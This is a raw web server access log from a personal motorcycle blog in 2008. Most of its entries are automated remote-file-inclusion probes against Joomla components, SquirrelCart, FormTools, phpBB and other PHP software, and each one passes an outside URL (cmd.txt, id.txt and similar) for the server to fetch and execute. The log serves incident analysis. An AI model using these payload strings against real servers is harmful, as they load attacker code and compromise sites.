84.24.194.147 - - [11/Jun/2008:11:50:25 -0700] "GET /blog/wp-content/uploads/2008/04/img_1129.JPG HTTP/1.1" 200 3839261 "http://images.google.nl/imgres?imgurl=http://dmulk.com/blog/wp-content/uploads/2008/04/img_1129.JPG&imgrefurl=http://dmulk.com/blog/category/motorcycles/&h=3888&w=2592&sz=3750&tbnid=LYCVZVbLsBpfNM:&tbnh=150&tbnw=100&hl=nl&prev=/images%3Fq%3Dhealthy%2Bbreakfast%26start%3D40%26gbv%3D2%26ndsp%3D20%26hl%3Dnl%26sa%3DN&frame=small" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; InfoPath.1)" "dmulk.com"
84.24.194.147 - - [11/Jun/2008:11:50:26 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; InfoPath.1)" "dmulk.com"
84.24.194.147 - - [11/Jun/2008:11:50:29 -0700] "GET /blog/index.php/category/motorcycles/ HTTP/1.1" 200 17309 "http://images.google.nl/imgres?imgurl=http://dmulk.com/blog/wp-content/uploads/2008/04/img_1129.JPG&imgrefurl=http://dmulk.com/blog/category/motorcycles/&h=3888&w=2592&sz=3750&hl=nl&start=54&tbnid=LYCVZVbLsBpfNM:&tbnh=150&tbnw=100&prev=/images%3Fq%3Dhealthy%2Bbreakfast%26start%3D40%26gbv%3D2%26ndsp%3D20%26hl%3Dnl%26sa%3DN" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; InfoPath.1)" "dmulk.com"
84.24.194.147 - - [11/Jun/2008:11:50:30 -0700] "GET /blog/wp-content/themes/default/style.css HTTP/1.1" 200 9232 "http://dmulk.com/blog/category/motorcycles/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; InfoPath.1)" "dmulk.com"
84.24.194.147 - - [11/Jun/2008:11:50:30 -0700] "GET /blog/wp-content/plugins/nggallery/css/nggallery.css HTTP/1.1" 200 5241 "http://dmulk.com/blog/category/motorcycles/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; InfoPath.1)" "dmulk.com"
190.54.28.163 - - [11/Jun/2008:11:50:39 -0700] "GET /logs/access_080116.log/start.php?s=ftp://193.253.223.43/tmp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
190.54.28.163 - - [11/Jun/2008:11:50:44 -0700] "GET /logs/access_080305.log/start.php?s=ftp://193.253.223.43/tmp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.112.170.41 - - [11/Jun/2008:11:50:52 -0700] "GET /logs/about.php?root=http://homert.100webspace.net/doc/flo1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
210.112.170.41 - - [11/Jun/2008:11:50:52 -0700] "GET /about.php?root=http://homert.100webspace.net/doc/flo1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
210.112.170.41 - - [11/Jun/2008:11:50:53 -0700] "GET /logs/about.php?root=http://www.acadie-contest.com/cmd.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
210.112.170.41 - - [11/Jun/2008:11:50:53 -0700] "GET /about.php?root=http://www.acadie-contest.com/cmd.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
84.19.184.14 - - [11/Jun/2008:11:51:17 -0700] "GET /logs/access.log/components/com_joomlaboard/image_upload.php?sbp=http://www.ffshrine.org/iplog???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.19.184.14 - - [11/Jun/2008:11:51:18 -0700] "GET /components/com_joomlaboard/image_upload.php?sbp=http://www.ffshrine.org/iplog???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.19.184.14 - - [11/Jun/2008:11:51:18 -0700] "GET /logs/components/com_joomlaboard/image_upload.php?sbp=http://www.ffshrine.org/iplog???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.103.40 - - [11/Jun/2008:11:51:23 -0700] "GET /logs/access.log///squirrelcart/cart_content.php?cart_isp_root=http://www.geocities.cm/paijoe_emo/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.227.103.40 - - [11/Jun/2008:11:51:23 -0700] "GET /logs///squirrelcart/cart_content.php?cart_isp_root=http://www.geocities.cm/paijoe_emo/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
203.72.181.15 - - [11/Jun/2008:11:51:47 -0700] "GET /logs/access_080123.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://ieras.ru/tmp/mid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.118.88.84 - - [11/Jun/2008:11:52:01 -0700] "GET /logs/access.log/components/com_joomlaboard/image_upload.php?sbp=http://www.teamamd.com/Downloads/AAO/Patch/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.118.88.84 - - [11/Jun/2008:11:52:04 -0700] "GET /components/com_joomlaboard/image_upload.php?sbp=http://www.teamamd.com/Downloads/AAO/Patch/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.118.88.84 - - [11/Jun/2008:11:52:04 -0700] "GET /logs/components/com_joomlaboard/image_upload.php?sbp=http://www.teamamd.com/Downloads/AAO/Patch/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
79.118.119.125 - - [11/Jun/2008:11:52:23 -0700] "GET /logs/access_080312.log HTTP/1.1" 200 1893701 "-" "wmua6vs6xk6h6ynusuitexxs" "www.dmulk.com"
81.3.11.60 - - [11/Jun/2008:11:52:32 -0700] "GET /logs/access_080213.log//modules/TotalCalendar/about.php?inc_dir=http://super4host.com/images/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.3.11.60 - - [11/Jun/2008:11:52:33 -0700] "GET //modules/TotalCalendar/about.php?inc_dir=http://super4host.com/images/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.3.11.60 - - [11/Jun/2008:11:52:33 -0700] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://super4host.com/images/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.7.193.199 - - [11/Jun/2008:11:52:39 -0700] "GET /logs/access_080308.log/option,com_sitemap/Itemid,73/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.103.40 - - [11/Jun/2008:11:52:41 -0700] "GET /logs/access_080312.log//admin/index.php?o=http://www.geocities.com/paijoe_emo/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.227.103.40 - - [11/Jun/2008:11:52:42 -0700] "GET //admin/index.php?o=http://www.geocities.com/paijoe_emo/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.227.103.40 - - [11/Jun/2008:11:52:42 -0700] "GET /logs//admin/index.php?o=http://www.geocities.com/paijoe_emo/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
160.99.12.231 - - [11/Jun/2008:11:52:45 -0700] "GET /logs//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
160.99.12.231 - - [11/Jun/2008:11:52:46 -0700] "GET //administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
212.227.103.40 - - [11/Jun/2008:11:52:55 -0700] "GET /logs/access_071225.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.geocities.com/paijoe_emo/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.227.103.40 - - [11/Jun/2008:11:52:55 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.geocities.com/paijoe_emo/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.227.103.40 - - [11/Jun/2008:11:52:56 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.geocities.com/paijoe_emo/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
193.192.58.2 - - [11/Jun/2008:11:52:56 -0700] "GET //components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.mondocitta.net/.htaccess_/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.3.11.60 - - [11/Jun/2008:11:53:11 -0700] "GET /logs/access_080201.log//modules/TotalCalendar/about.php?inc_dir=http://super4host.com/images/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
193.254.184.51 - - [11/Jun/2008:11:53:37 -0700] "GET /modules/tinycontent/admin/index.php?spaw_root=http://1285-2.1st-housing.de/skins/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
193.254.184.51 - - [11/Jun/2008:11:53:37 -0700] "GET /errors.php?error=http://1285-2.1st-housing.de/skins/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
216.167.156.20 - - [11/Jun/2008:11:53:59 -0700] "GET /logs/access.log//components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.mondocitta.net/.htaccess_/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.167.156.20 - - [11/Jun/2008:11:54:02 -0700] "GET //components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.mondocitta.net/.htaccess_/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.167.156.20 - - [11/Jun/2008:11:54:05 -0700] "GET /logs//components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.mondocitta.net/.htaccess_/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.18.151.242 - - [11/Jun/2008:11:54:10 -0700] "GET /logs/access_080118.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.18.151.242 - - [11/Jun/2008:11:54:10 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.18.151.242 - - [11/Jun/2008:11:54:13 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
200.126.108.198 - - [11/Jun/2008:11:54:21 -0700] "GET /logs/access_080309.log/components/com_rssxt/pinger.php?mosConfig_absolute_path=http://www.lasalle-francia.cl/cache/%20%20%20/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.126.108.198 - - [11/Jun/2008:11:54:22 -0700] "GET /components/com_rssxt/pinger.php?mosConfig_absolute_path=http://www.lasalle-francia.cl/cache/%20%20%20/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.126.108.198 - - [11/Jun/2008:11:54:22 -0700] "GET /logs/components/com_rssxt/pinger.php?mosConfig_absolute_path=http://www.lasalle-francia.cl/cache/%20%20%20/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.18.151.242 - - [11/Jun/2008:11:54:29 -0700] "GET /logs/access_080123.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
212.227.103.40 - - [11/Jun/2008:11:54:30 -0700] "GET /logs/access_071230.log///squirrelcart/cart_content.php?cart_isp_root=http://www.geocities.cm/paijoe_emo/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.13.233.174 - - [11/Jun/2008:11:54:30 -0700] "GET /logs/access_080118.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.13.233.174 - - [11/Jun/2008:11:54:30 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.13.233.174 - - [11/Jun/2008:11:54:30 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.227.103.40 - - [11/Jun/2008:11:54:35 -0700] "GET /logs/access_080312.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.geocities.com/paijoe_emo/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
207.210.111.220 - - [11/Jun/2008:11:54:37 -0700] "GET /logs/access_080118.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.210.111.220 - - [11/Jun/2008:11:54:37 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.210.111.220 - - [11/Jun/2008:11:54:37 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
200.126.108.198 - - [11/Jun/2008:11:54:37 -0700] "GET /logs/access_080312.log/errors.php?error=http://www.lasalle-francia.cl/cache/%20%20%20/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.126.108.198 - - [11/Jun/2008:11:54:38 -0700] "GET /errors.php?error=http://www.lasalle-francia.cl/cache/%20%20%20/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.126.108.198 - - [11/Jun/2008:11:54:39 -0700] "GET /logs/errors.php?error=http://www.lasalle-francia.cl/cache/%20%20%20/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.13.233.174 - - [11/Jun/2008:11:54:45 -0700] "GET /logs/access_080123.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.7.207.104 - - [11/Jun/2008:11:54:52 -0700] "GET /logs/access_080118.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.7.207.104 - - [11/Jun/2008:11:54:52 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.7.207.104 - - [11/Jun/2008:11:54:52 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
82.194.71.79 - - [11/Jun/2008:11:54:54 -0700] "GET /logs/access_080119.log//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://powderpuffsquad.com/admin/backups/.de/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.53.240.146 - - [11/Jun/2008:11:55:03 -0700] "GET /logs/access_080507.log/phphtml.php?htmlclass_path=http://powderpuffsquad.com//images/press/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.240.146 - - [11/Jun/2008:11:55:03 -0700] "GET /phphtml.php?htmlclass_path=http://powderpuffsquad.com//images/press/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.240.146 - - [11/Jun/2008:11:55:04 -0700] "GET /logs/phphtml.php?htmlclass_path=http://powderpuffsquad.com//images/press/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.240.146 - - [11/Jun/2008:11:55:10 -0700] "GET /logs/access_080507.log/phphtml.php?htmlclass_path=http://powderpuffsquad.com//images/press/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.240.146 - - [11/Jun/2008:11:55:10 -0700] "GET /phphtml.php?htmlclass_path=http://powderpuffsquad.com//images/press/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.7.207.104 - - [11/Jun/2008:11:55:11 -0700] "GET /logs/access_080123.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.53.240.146 - - [11/Jun/2008:11:55:11 -0700] "GET /logs/phphtml.php?htmlclass_path=http://powderpuffsquad.com//images/press/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.52.136.89 - - [11/Jun/2008:11:55:18 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.230.197.170 - - [11/Jun/2008:11:55:21 -0700] "GET /logs/access_080215.log/errors.php?error=http://www.lasalle-francia.cl/cache/%20%20%20/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.18.151.242 - - [11/Jun/2008:11:55:38 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
59.106.19.213 - - [11/Jun/2008:11:55:44 -0700] "GET /logs/access.log//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://durhaka.100webspace.net/alat/echo1? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.106.19.213 - - [11/Jun/2008:11:55:44 -0700] "GET //administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://durhaka.100webspace.net/alat/echo1? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.106.19.213 - - [11/Jun/2008:11:55:45 -0700] "GET /logs//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://durhaka.100webspace.net/alat/echo1? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.13.233.174 - - [11/Jun/2008:11:55:48 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.227.103.40 - - [11/Jun/2008:11:55:49 -0700] "GET //FormTools1_5_0/global/templates/client_page_open.php?g_root_dir=http://www.geocities.cm/paijoe_emo/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.118.88.84 - - [11/Jun/2008:11:55:55 -0700] "GET /logs/access_080118.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.teamamd.com/Downloads/AAO/Patch/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.118.88.84 - - [11/Jun/2008:11:55:55 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.teamamd.com/Downloads/AAO/Patch/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.118.88.84 - - [11/Jun/2008:11:55:55 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.teamamd.com/Downloads/AAO/Patch/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
84.19.184.14 - - [11/Jun/2008:11:55:58 -0700] "GET /logs/access.log/components/com_joomlaboard/image_upload.php?sbp=http://www.ffshrine.org/iplog???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.19.184.14 - - [11/Jun/2008:11:55:58 -0700] "GET /components/com_joomlaboard/image_upload.php?sbp=http://www.ffshrine.org/iplog???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.19.184.14 - - [11/Jun/2008:11:55:59 -0700] "GET /logs/components/com_joomlaboard/image_upload.php?sbp=http://www.ffshrine.org/iplog???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.52.136.89 - - [11/Jun/2008:11:56:03 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.7.207.104 - - [11/Jun/2008:11:56:08 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.13.233.174 - - [11/Jun/2008:11:56:34 -0700] "GET /logs/access.log/index2.php?x=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.13.233.174 - - [11/Jun/2008:11:56:34 -0700] "GET /index2.php?x=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.13.233.174 - - [11/Jun/2008:11:56:34 -0700] "GET /logs/index2.php?x=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.18.151.242 - - [11/Jun/2008:11:56:35 -0700] "GET /logs/access.log/index2.php?x=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.18.151.242 - - [11/Jun/2008:11:56:35 -0700] "GET /index2.php?x=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.18.151.242 - - [11/Jun/2008:11:56:35 -0700] "GET /logs/index2.php?x=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
212.227.103.40 - - [11/Jun/2008:11:56:37 -0700] "GET //FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=http://www.geocities.cm/paijoe_emo/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
84.19.184.14 - - [11/Jun/2008:11:56:37 -0700] "GET /logs/access_080219.log/index.php?option=com_jd-wp&task=cat_view&gid=&mosConfig_absolute_path=http://www.ffshrine.org/iplog???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.52.136.89 - - [11/Jun/2008:11:56:44 -0700] "GET /logs/access_080123.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
212.227.103.40 - - [11/Jun/2008:11:56:50 -0700] "GET /logs/access_080513.log//FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=http://www.geocities.com/paijoe_emo/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.227.103.40 - - [11/Jun/2008:11:56:50 -0700] "GET //FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=http://www.geocities.com/paijoe_emo/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.1.202.61 - - [11/Jun/2008:11:56:50 -0700] "GET /logs/access_080307.log/showthread.php?t=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.227.103.40 - - [11/Jun/2008:11:56:50 -0700] "GET /logs//FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=http://www.geocities.com/paijoe_emo/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.1.202.61 - - [11/Jun/2008:11:56:51 -0700] "GET /showthread.php?t=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.1.202.61 - - [11/Jun/2008:11:56:52 -0700] "GET /logs/showthread.php?t=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.227.103.40 - - [11/Jun/2008:11:56:59 -0700] "GET /logs/access_080314.log//FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=http://www.geocities.com/paijoe_emo/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.227.103.40 - - [11/Jun/2008:11:57:46 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.geocities.com/paijoe_emo/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.227.103.40 - - [11/Jun/2008:11:57:51 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.geocities.com/paijoe_emo/id.txt??? HTTP/1.1" 200 3694 "-" "libwww-perl/5.803" "www.dmulk.com"
212.227.103.40 - - [11/Jun/2008:11:57:51 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.geocities.com/paijoe_emo/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.118.88.84 - - [11/Jun/2008:11:57:54 -0700] "GET /logs/access_080123.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.teamamd.com/Downloads/AAO/Patch/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
77.55.90.2 - - [11/Jun/2008:11:58:05 -0700] "GET /inc/cmses/aedatingCMS.php?dir[inc]=http://www.mondocitta.net/.htaccess_/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
84.19.184.14 - - [11/Jun/2008:11:58:10 -0700] "GET /logs/access_080131.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.ffshrine.org/iplog???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.19.184.14 - - [11/Jun/2008:11:58:10 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.ffshrine.org/iplog???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.19.184.14 - - [11/Jun/2008:11:58:10 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.ffshrine.org/iplog???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
160.99.12.231 - - [11/Jun/2008:11:58:17 -0700] "GET //index.php?option=com_custompages=%A7ionid=&id=&mosConfig_absolute_path=http://fsm.upsi.edu.my/db/31337.txt? HTTP/1.1" 200 18511 "-" "libwww-perl/5.65" "www.dmulk.com"
